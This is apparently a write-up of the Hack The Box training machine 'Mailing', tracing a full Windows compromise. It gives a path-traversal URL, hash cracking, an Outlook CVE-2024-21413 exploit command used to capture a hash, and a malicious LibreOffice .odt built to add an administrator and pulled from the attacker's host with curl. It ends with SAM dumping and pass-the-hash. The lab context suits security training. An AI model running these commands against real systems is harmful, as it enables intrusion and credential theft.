HTB Mailing Writeup

3 minute read

Published:

A writeup of the Hack The Box machine “Mailing” with easy difficulty

Welcome to this writeup of the HTB seasonal machine called Mailing. It is a Windows machine with easy difficulty.

Enumeration

First, run a Nmap scan which gives the following results:

We can see a webpage called mailing.htb so we put this in the /etc/hosts file with the IP of the machine: 10.10.11.14.

This shows us the webpage >

Next, we run a dirsearch scan to enumerate directories >

Hmm alright. There is an /assets page and a /download.php page.

The /assets page only shows us beautiful pictures of nature 😊 and the download page says “No file specified for download”.

After that someone requested a machine reset lol.

Allright, so I think LFI (Local File Inclusion) is a possible entry point with this /download.php page.

User flag

After some more enumeration, I could download a hMailServer.INI file via the following URL: http://mailing.htb/download.php?file=../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI

This file contains the administrator password of something >

These are hashed passwords we have to crack with hashcat > hashcat --force -m 0 -a 0 pass.txt /usr/share/wordlists/rockyou.txt –where –m 0 stands for a md5 hash.

This password is for telnet access. Port 110 is the pop3 mailserver.

With the command telnet 10.10.11.14 110 we can connect to the mailserver.

There are no messages sadly. But the username and password are correct.

With the https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability exploit a user and a password can be obtained.

Setup a responder listerner with: sudo responder -I tun0 -v

Then we run the following command > python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password <The-password-we-obtained> --sender [email protected] --recipient [email protected] --url "\\IP/blabla" --subject Hello

This will give you a hash which is a password we can crack with hashcat.

A Evil winrm can be established with: evil-winrm -i 10.10.11.14 -u maya -p <Cracked-password>

The user flag can be found in the Desktop directory >

Root flag

After searching the directories on the machine, we discovered that Libreoffice is running an outdated version. After searching for an exploit, we can use this tool: https://github.com/elweth-sec/CVE-2023-2255 to probably gain root.

With this tool we can use the command: python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'.

We need to deliver this malicious file to the windows machine. This can be done with a python server and a curl command. >

In a new terminal window type: python3 –m http.server 4444

And in our Evil-WinRM: Go the the Important Documents dir (this is a root directory).

And curl the exploit.odt file to the windows machine > curl –o exploit.odt http://10.10.14.82:4444/exploit.odt.

With the command net users maya we have a new admin local group now.

With the post exploitation tool crackmapexec, we can run this command > crackmapexec smb 10.10.11.14 -u maya -p " <maya-admin-password> " --sam.

This way we can obtain the localadmin user’s hash.

We don’t have to crack the hash if we use the impacket-wmiexec tool with the command: impacket-wmiexec [email protected] -hashes "<hash-of-administrador>"

This gives us the root flag >

Conclusion

To pwn this machine took a lot more time than I thought. Again, searching for an entry point in the directories of the machine takes time because of the many dirs and files.

I hope you have learned something from this writeup.

Enjoy your day!